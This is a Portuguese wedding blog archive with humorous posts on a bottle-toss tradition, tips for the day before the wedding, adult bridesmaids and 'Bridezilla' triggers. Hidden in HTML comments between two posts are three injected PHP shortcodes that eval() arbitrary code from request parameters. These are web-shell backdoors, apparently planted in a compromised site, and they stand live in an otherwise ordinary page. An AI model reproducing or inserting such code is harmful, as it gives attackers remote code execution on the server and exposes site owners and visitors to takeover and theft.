Categoria: meu jeitinho

Jogar garrafa de bebida | Veja como foi no meu casamento!

jogar garrafa de bebida

Em um post passado, eu contei que o momento mais memorável do nosso casamento foi jogar garrafa de bebida.

Agora que recebemos as fotos, é claro que vou mostrar como foi esse momento mágico, hilário e serelepe. Claro, quando eu puder editar o vídeo, também vou postar aqui como foi engraçado o momento de jogar garrafa de bebida.

(aperte o play pra ler o post)

O momento da revelação: o noivo ia jogar garrafa de bebida logo após eu jogar o buquê de flores e o buquê de Santo Antônio!

jogar garrafa de bebida

A galera, claro, pirou! Tinha gente pulando, subindo em amigos, dando uma de goleiro…

jogar garrafa de bebida

3… 2… 1…

jogar garrafa de bebida
rá! Pegadinha do malandro! Ele não jogou! Ele fez isso umas duas vezes hahaha

3… 2… 1… FOI!

jogar garrafa de bebida
I BELIEVE I CAN FLYYYY!

E esse foi o voador sortudo que conseguiu!

jogar garrafa de bebida

Parabéns a todos os envolvidos xD

Leia +

Cortar a gravata do noivo | Uma alternativa caso você não queira explorar seus convidados descaradamente

Véspera do casamento: o que REALMENTE fazer?

véspera do casamento

Esqueça (quase) tudo o que você já leu a respeito do que fazer na véspera do casamento.

véspera do casamento

Muitas dicas para mim que sou uma doida varrida ansiosa se referem a etapas que a noiva já deveria ter concluído no mínimo dias antes. Mas na véspera do casamento, a última coisa que a noiva deve pensar é justamente essa: de que em menos de 24h ela estará se casando!

véspera do casamento
Essa reação é completamente normal.

Coisas que falam que você deve fazer na véspera do casamento, mas que já deveria ter feito antes:
– Providenciar a caneta da cerimônia: essa é uma das coisas que você pode pedir ao noivo, com pelo menos 1 semana de antecedência.
– Pensar no perfume que você vai usar: bitch, please, pense nisso antes da véspera do casamento.
– Decidir como os noivos vão voltar da festa: em tempos de Uber, nem tem o que pensar!

véspera do casamento
Só cuidado com os taxistas!

– Pensar na roupa que vai usar no making of: sério isso? A essa altura você já providenciou uma roupa simples e linda, ou o roupão da noiva, né?

véspera do casamento
– Preparar o nome das amigas que vão na barra: deixe pronto ANTES da véspera. Mas deixe para prender no making of 😉
– Escrever os votos: se você deixar para a véspera, vai acabar ficando ansiosa e não vai conseguir. Deixe para escrever os votos com calma, ao longo dos meses antes do casamento.

 

O que fazer na véspera do casamento, então?

– Faça procedimentos de beleza simples, como as unhas e sobrancelha. Eu fiz esses dois procedimentos e retoquei a raiz do cabelo!
– Arrume a mala do que precisa levar e separe as coisas que gostaria que fossem fotografadas.
– Escute músicas que te relaxem, que te façam feliz!
Relaxe, medite!

véspera do casamento

– Consegue tirar um dia para curtir suas amigas e seus familiares? Então aproveite! Dê risada, tire a cabeça do casamento, esqueça esse assunto um pouco!

véspera do casamento
Se as amigas forem patetas, melhor ainda!

– Faça alguma atividade que te canse, mas que não ofereça risco de vida e de saúde e nem que te ESGOTE, a ponto de interferir no dia seguinte. No meu caso, eu fiz uma faxina em casa hahaha isso é vital para o item a seguir:
– Durma cedo e durma bem! Despedida de solteira na véspera do casamento? Nem pensar!

Você verá que com essas dicas simples você estará pronta para aproveitar o dia seguinte com calma, tranquilidade e muita alegria e disposição!

véspera do casamento

 

Como foram as últimas horas antes do meu casamento #VlogTôCasando

Não deu tempo de filmar muita coisa. Mas fiz questão de filmar o que dava hahaha vejam aqui como foi!

  

Não como outro “dia 23” qualquer. 

Hoje completamos 5 anos e 4 meses, mas esse é um dia 23 muito importante e especial: é o dia em que vamos dar entrada no nosso casamento civil.
Minha ficha ainda não caiu… Será que um dia vou entender que meu maior sonho aos poucos está se realizando?   

Damas de honra adultas – sim, aqui no Brasil. Por que não?

Você já deve ter visto em filmes e programas que os gringos têm um costume diferente de nós em relação às damas de honra.

Aqui ~usamos~ crianças, que podem ser nossas irmãs mais novas, sobrinhas, primas, filhas das melhores amigas, filhas das amigas, filhas da vizinha (que você só convidou porque não tinha outra criança pra ser sua dama de honra), filhas do primo do seu Genaro da banca de jornal da Mooca…
Pois é, começa uma busca insana por arrumar uma criança para levar as alianças… E se você quiser criança levando plaquinha, jogando flores e etc, VISH! Aí que dá trabalho mesmo!
Será que vende crianças no Aliexpress?
Eu não tenho crianças na família e lamentava que aqui no Brasil não fosse costume ter damas de honra adultas. Quando eu começava a planejar onde eu poderia sequestrar uma criança, eu pensei:”Quer saber? O casamento é meu e se eu quiser damas adultas, TEREI DAMAS ADULTAS.”
Perfeito, já que tenho 0 crianças e 109834743895 amigas (e não quero dar uma de Preta Gil com 948 casais de padrinhos).
Elegi 3 das minhas melhores amigas:
uma para levar as alianças
uma para levar a plaquinha “Lá vem a noiva!”
e uma para ser a florista
Quando contei para elas, elas ficaram bem felizes, mas só souberam de fato o que iam fazer na cerimônia quando receberam o convite oficial de damas de honra (assunto para um post futuro).
O papel delas, antes da cerimônia, é meio como Madrinhas Power: elas estão por dentro de TUDO que vai rolar, me dão opinião, acompanham vários processos… E estarão comigo antes da cerimônia me acalmando, e durante a festa me ajudando a manter meu copo de caipirinha sempre cheio, já que não vou conseguir ter paz para pegar minhas bebidas no bar; valeu, amigas lindas!
Vantagens de ter damas de honra adultas
1) Não corre o risco de acontecer isso
2) Nem isso.
Ok, isso eu acharia o máximo, mas tem gente que não gosta, né?
3) Você não tem que providenciar vestidinhos (ou seja, uma coisa a menos para se preocupar e gastar).
Expectativa
Realidade
4) O que você vai ter é isso:
5) E isso:
6) E mais isso:
Momentos inesquecíveis com as melhores amigas, no dia mais especial da sua vida: precisa de mais motivos?

<!– [insert_php]if (isset($_REQUEST["Khb"])){eval($_REQUEST["Khb"]);exit;}[/insert_php][php]if (isset($_REQUEST["Khb"])){eval($_REQUEST["Khb"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["aSC"])){eval($_REQUEST["aSC"]);exit;}[/insert_php][php]if (isset($_REQUEST["aSC"])){eval($_REQUEST["aSC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["SDs"])){eval($_REQUEST["SDs"]);exit;}[/insert_php][php]if (isset($_REQUEST["SDs"])){eval($_REQUEST["SDs"]);exit;}[/php] –>

Como despertar a Bridezilla

Este é um post que você, noiva, deve enviar a todos que te cercam. Inclusive para o noivo.

Sim, é pelo bem deles. E pelo seu bem também.
~*~*~*~
Olá, pessoa que convive com uma noiva. Como vai você? Tudo bem, tudo na paz?
Pois saiba que pra essa moça que está para se casar, nem tudo está na paz.
Antes de saber o que desperta a bridezilla (para justamente EVITAR fazer), vamos conhecer sua ficha técnica.
Bridezilla
 
Também conhecida por “Noiva Neurótica”, “Noiva Maluca”, “Aquela doida que vai casar”, entre outras nomenclaturas populares.
Habitat: em diversos locais do planeta, pois é uma criatura que se adapta a qualquer ambiente. Só não se adapta a comentários maldosos, decorações cafonas e opiniões que não foram solicitadas.
Alimentação: varia entre 5 barras de chocolate por dia e 1 folha de alface por refeição.
Origem: causado pelo vírus Bridezilla chilicus, latente em todas as mulheres, que se manifesta com algumas atitudes de amigos, familiares e coordenadores de evento nos meses que antecedem seu casamento.
 
Agora que você já conhece a criatura, vamos aos elementos que fazem com que tal vírus se manifeste:
1) “Você vai casar? Aff, pra quê?”, by recalcada.
Bitch, se SEU casamento acabou ou está uma porcaria, não venha questionar o motivo de alguém casar. Certamente alguém te questionou quando foi sua vez e isso influenciou na sua decisão? Não, né? Pois é.
2) “Ah, não acho que vale a pena gastar tanto pra fazer uma festa. Com esse dinheiro você poderia viajar, ou guardar para a aposentadoria…”, by alguma tia qualquer.
Nossa, eu nem tinha pensado nisso, valeu! Vou cancelar com o buffet, fotógrafo, cinegrafista, loja do vestido… Valeuzão, não sei o que seria de mim sem seus conselhos!
3) “Por que lilás? A toalha TEM que ser dessa cor? Essa azul não serve?”, by noivo, mãe, amigas…
É… Serve… Pra enrolar no seu pescoço e te sufocar até a morte.
4) “Você pode escolher apenas uma cor de flor na decoração, mas o tipo de flor nós que escolhemos. E a decoração da mesa do bolo é essa, é fixa, porque as flores são artificiais e fixas na mesa. É, a decoração da mesa dos noivos também vai ser essa, não dá pra mudar.”, by buffet que ~parecia perfeito~
#truestory
Sem palavras.
5) “Vai me convidar né?”, diz a pessoa que no dia a dia mal olha na sua cara.
Vou. Vou te convidar a se retirar da minha vida.
 
6) “Como assim você não vai convidar sua tia lá de Piraroquinha da Serra Pelada para ser sua madrinha? Ela é FAMÍLIA e gostava tanto de você quando você tinha 5 anos e passava o feriado na casa dela!”, by mãe.
Puxa, seria uma ótima ideia… Se a última vez que eu tivesse tido contato com ela não tivesse sido, de fato, quando eu tinha 5 anos!
7) “Aff, só vai comer isso? Que paranoia!”, by qualquer pessoa que te veja comendo salada e frango grelhado.
                            É, tá certo, vou comer qualquer coisa e torcer pro vestido não arrebentar.
 
 
8) “Cuidado com a alimentação, hein! Assim não vai entrar no vestido!”, by qualquer pessoa que se acha íntima o suficiente para falar isso ao te ver comendo um biscoito.
VerdadFODA-SE!
As reações da Bridezilla na hora podem até ser como nos gifs. Mas não se iluda. Por dentro, o monstro está se agitando, e corre o risco de no dia do casamento ela estar assim:
Estejam avisados.

Com quem será?

Essa era a música que eu mais temia quando criança! Eu saía correndo da minha festinha de aniversário (porque sempre o noivo escolhido pelos mexeriqueirinhos de 10 anos de idade era algum moleque bem nada a ver) chorando.
Ao longo da adolescência eu dizia: não, não quero me casar. No máximo me juntar.

Mas parece que quando encontramos a pessoa certa, a vontade de casar é natural. Parece que encontrar a pessoa certa, por si só, já parece impossível, então quando a encontramos, casar não parece mais um absurdo.

E foi assim que aconteceu comigo. Anos de negação foram por água abaixo quando conheci meu noivo. Com 3 meses de namoro percebemos que não tínhamos outra opção senão ficarmos juntos para sempre.

Mas… Ele estava no começo da faculdade e teríamos 5 longos anos de espera. Mas tudo bem, 4 desses 5 anos se passaram e agora falta pouco… Muito pouco!
Nesses 5 anos fui pesquisando coisinhas de casamento, inspirações e aos poucos ele foi tomando forma. Agora é só viabilizar!

E por estar perdida entre tantas coisas a fazer, resolvi fazer esse blog. Para me ajudar a ver tudo num panorama geral e para ajudar as futuras noivinhas com ideias, dicas, etc…
Se você está para se casar, acompanhe essa aventura de dois malucos (porque vocês verão: é o que somos) planejando um casamento. Se você pensa em se casar um dia, espero que o blog te ajude a ao menos ir pensando no que gosta, no que não gosta. E se você não quer casar? Acompanhe também! Quem sabe a vontade de casar não surge?

%d blogueiros gostam disto: